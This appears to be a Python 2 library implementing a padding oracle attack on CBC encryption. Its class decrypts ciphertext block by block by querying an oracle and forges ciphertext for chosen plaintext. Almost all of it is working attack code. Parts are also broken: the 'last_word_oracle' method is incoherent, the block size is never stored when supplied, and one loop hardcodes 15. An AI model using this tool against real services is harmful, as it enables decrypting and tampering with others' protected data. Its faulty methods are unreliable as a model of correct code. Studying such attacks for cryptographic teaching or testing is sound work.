#!/usr/bin/python
from base64 import b64encode, b64decode
from copy import deepcopy
import logging
import random


class Encoding:
    ''' Encoding Enum '''

    b64       = 1
    b64_web   = 2
    hex       = 3
    raw       = 5

class PaddingOracle(object):
    '''
        Generic code to attack padding oracles
    '''


    def __init__(self, ciphertext, BS=None, verbosity=1, encoding=Encoding.b64, oracle=None):

        # setup logging - default
        self.set_verbosity(verbosity)

        # init class variables
        self.encoding = encoding
        self.oracle_func = oracle
        self.analyse_func = None

        # encode the initial ciphertext
        self.ct = self.decode(ciphertext)

        # if no BS is give, determine the BS
        if BS == None:
            self.BS = self.get_blocksize(self.ct)

        self.num_blocks = self._ct_init()

        self.blocks = self.split_blocks(self.ct)
        self._outmode = "hex"

        # backup it_blocks and pt_blocks as dict {index:block} - for changing blocks
        self.it_blocks = {}
        self.pt_blocks = {}



    '''
        Used to decode the ciphertext, using the class variable self.encoding,
        internally the ciphertext is processed as string (bytes)
    '''
    def decode(self, ciphertext):
        if self.encoding == Encoding.b64:
            ciphertext = b64decode(ciphertext)
        elif self.encoding == Encoding.hex:
            ciphertext = ciphertext.decode('hex')
        elif self.encoding == Encoding.b64_web:
            ciphertext = b64decode(ciphertext) #TODO: adjust to b64web_decoding
        return ciphertext

    '''
        Used to encode the ciphertext, using the class variable self.encoding,
        internally the ciphertext is processed as string (bytes) but returned
        in the same fashion as the input was
    '''
    def encode(self, ciphertext):
        if self.encoding == Encoding.b64:
            ciphertext = b64encode(ciphertext)
        elif self.encoding == Encoding.hex:
            ciphertext = ciphertext.encode('hex')
        elif self.encoding == Encoding.b64_web:
            ciphertext = b64encode(ciphertext) #TODO: adjust to b64web_decoding
        return ciphertext




    '''
        simple length checks and blockcount
    '''
    def _ct_init(self):
        if len(self.ct) % self.BS != 0:
            raise Exception("[-] Length not a multiple of the BS")
        return len(self.ct) / self.BS


    '''
        splits the ciphertext in bs-large blocks
    '''
    def split_blocks(self, ct):
        return [bytearray(ct[i:i+self.BS]) for i in xrange(0, len(ct), self.BS)]

    '''
        merges the blocks together and return ciphertext
    '''
    def merge_blocks(self, blocks):
        return "".join([str(b) for b in blocks])


    def last_word_oracle(self, y):
        r = [chr(random.randint(0x00, 0xff)) for i in range(self.BS)]
        r_b = r[-1]
        for i in range(256):
            r[-1] = chr(ord(r_b) ^ i)
            y = ''.join(r)

            # ask the oracle
            if self.oracle_func(r + y):
                # padding is 0x01
                r_b = r_b ^ i

                # for n = b down to 2
                for n in range(self.BS, 1, -1):
                    r = r[self.BS-n] * r[self.BS-2]


    '''
        bool oracle(ct) - should return True if ct is correct and False if padding error
    '''
    def crack_last_block(self, blocks):

        orig_blocks = deepcopy(blocks) # deepcopy for not referencing lists...

        pt_block = [0]*self.BS   # plaintext block
        it_block = [0]*self.BS   # intermidiate block

        orig_pre_ct = orig_blocks[-2]

        # only assigning the lists will reference to the original blocks-list!!
        pre_ct = blocks[-2]   # second to last ct block - gets modified
        last_ct = blocks[-1]  # last ct block

        real_padding = self.BS
        first_run = True

        # byte_index is counting backwards in the second-to-last block
        for byte_index in xrange(self.BS-1, -1, -1):

            padding = self.BS - byte_index

            # gets jumped over during the first run
            if byte_index < 15:
                for prev_byte_index in xrange(15, byte_index, -1):
                    #print("[-] Adjusting byte @ offset %d [Padding: %x]" % (prev_byte_index, padding))
                    pre_ct[prev_byte_index] = it_block[prev_byte_index] ^ padding


            for guess in xrange(256):
                # iterate the bytes @ byte_index position
                pre_ct[byte_index] = guess

                # ask the oracle
                #if oracle(merge_blocks(blocks)) and orig_pre_ct[byte_index] != guess:
                if self.oracle_func == None:
                    raise Exception("[-] No Oracle function set!")

                if self.oracle_func(self.merge_blocks(blocks)):
                    if guess == orig_pre_ct[byte_index] and padding < real_padding:
                        continue

                    pt_block[byte_index] = guess ^ padding ^ orig_pre_ct[byte_index]

                    if first_run:
                        real_padding = pt_block[byte_index]
                        print('')
                        first_run = False

                    it_block[byte_index] = guess ^ padding
                    logging.debug("[~]  correct padding [{0}] with byte [{1}]\n\t-> it_byte = {0} ^ {1}    = {3}\n\t-> pt_byte = it_byte ^ {2} = {4}\n".format(hex(padding),\
                            hex(guess), hex(orig_pre_ct[byte_index]), hex(it_block[byte_index]),hex(pt_block[byte_index])))
                    logging.debug("[+] Plaintext Block: {}".format(pt_block))
                    break

        return it_block, pt_block

    '''
        used to print the ct blocks as hexdump
    '''
    def print_ct_blocks(self):
        print("[~] ciphertext as blockwise hexdump")
        ch_arr = self.bytes_to_string(reduce(lambda x, y: x+y, [list(ba) for ba in self.blocks]))
        print(self.hexdump(ch_arr, length=self.BS))


    '''
        convert a byte-list to a string
    '''
    def bytes_to_string(self, inp):
        return "".join([chr(p) for p in inp])


    '''
        change block @ index to a new block
    '''
    def change_block(self, new_plaintext):

        if len(new_plaintext) % self.BS != 0:
            raise Exception("[-] new plaintext should be a multiple of the blocksize")

        # Startin at Block 2 (index 1)
        new_blocks = self.split_blocks(new_plaintext)
        num_new_blocks = len(new_blocks)
        local_blocks = deepcopy(self.blocks)
        local_it_blocks = deepcopy(self.it_blocks)


        if num_new_blocks > len(local_blocks):
            raise Exception("[-] Plaintext is too long")

        for idx in range(num_new_blocks-1, 0, -1):
            logging.info("[*] changing index %d" % idx)
            it_block = self.get_it_block(idx, local_blocks)
            local_blocks[idx-1] = ''.join(map(lambda (x,y): chr(x^y), zip(new_blocks[idx], it_block)))

        x = self.merge_blocks(local_blocks)

        # adjust all the previous blocks (iv block_0 = IV, the complete message can be changed)
        return self.encode(x)

    '''
        used to crack the block @ index
        index := {0, 1, .., .., len-1}
    '''
    def get_it_block(self, index, ct_blocks):

        if not index:
            raise Exception("[-] Cannot decrypt the first block")
        local_blocks = deepcopy(ct_blocks)
        it_block, pt_block = self.crack_last_block(local_blocks[:index+1])
        return it_block


    '''
        used to crack the block @ index
        index := {0, 1, .., .., len-1}
    '''
    def crack_block(self, index):

        if not index:
            raise Exception("[-] Cannot decrypt the first block")
        local_blocks = deepcopy(self.blocks)
        it_block, pt_block = self.crack_last_block(local_blocks[:index+1])

        self.it_blocks[index] = it_block
        self.pt_blocks[index] = pt_block

        logging.info("\n[+] decrypted block [%d]\n" %(index))
        self._output(pt_block)


    '''
        universal func. to output plaintext
    '''
    def _output(self, pt_block):
        print("-----[ Plaintext ]-----")

        if self._outmode == "hex":
            print(self.hexdump(self.bytes_to_string(pt_block)))
        elif self._outmode == "str":
            print(self.bytes_to_string(pt_block))


    '''
        set the output mode for printing the plaintext
    '''
    def set_output(self, mode):
        self._outmode = mode


    '''
        verbosity for different output
        0 = no output
        1 = INFO
        2 = DEBUG
    '''
    def set_verbosity(self, level):
        levels = {
                0:logging.WARNING,
                1:logging.INFO,
                2:logging.DEBUG
                }
        logging.basicConfig(format='%(message)s', level=levels.get(level, logging.INFO))


    '''
        crack all blocks of the ciphertext (except first one)
    '''
    def decrypt_all_blocks(self):

        orig_blocks = deepcopy(self.blocks)
        local_blocks = deepcopy(self.blocks)

        num_blocks = len(self.blocks)
        pt_blocks = []
        logging.info("[*] decrypting all %d blocks" % num_blocks)
        for idx in xrange(num_blocks, 1, -1):
            logging.info("\n-----[ decrypting block %d ]-----\n" %(idx))
            it_block, pt_block = self.crack_last_block(local_blocks[:idx])
            pt_blocks.append(pt_block)
            local_blocks = deepcopy(orig_blocks)

            self.it_blocks[idx-1] = it_block
            self.pt_blocks[idx-1] = pt_block

        pt_blocks = pt_blocks[::-1]
        pt = reduce(lambda x, y: x+y, pt_blocks)

        logging.info("\n[+] decrypted all the blocks\n")
        self._output(pt)


    '''
        get the blocksize via the oracle - described in 'Practical Padding Oracle Attacks', by T. Duong & J. Rizzo
        Works like following:
    '''
    def get_blocksize(self, ciphertext):
        if self.oracle_func == None:
            raise Exception('Error: Not oracle set!')

        if len(ciphertext) % 16 == 8:
            return 8

        c = ciphertext[-16:]
        if self.oracle_func(ciphertext + c) == True:
            return 8

        return 16


    def hexdump(self, src, length=16):
        ''' https://gist.github.com/sbz/1080258 '''
        src = str(src)
        FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
        lines = []
        for c in xrange(0, len(src), length):
            chars = src[c:c+length]
            hex = ' '.join(["%02x" % ord(x) for x in chars])
            printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or '.') for x in chars])
            lines.append("%04x  %-*s  %s\n" % (c, length*3, hex, printable))
        return ''.join(lines)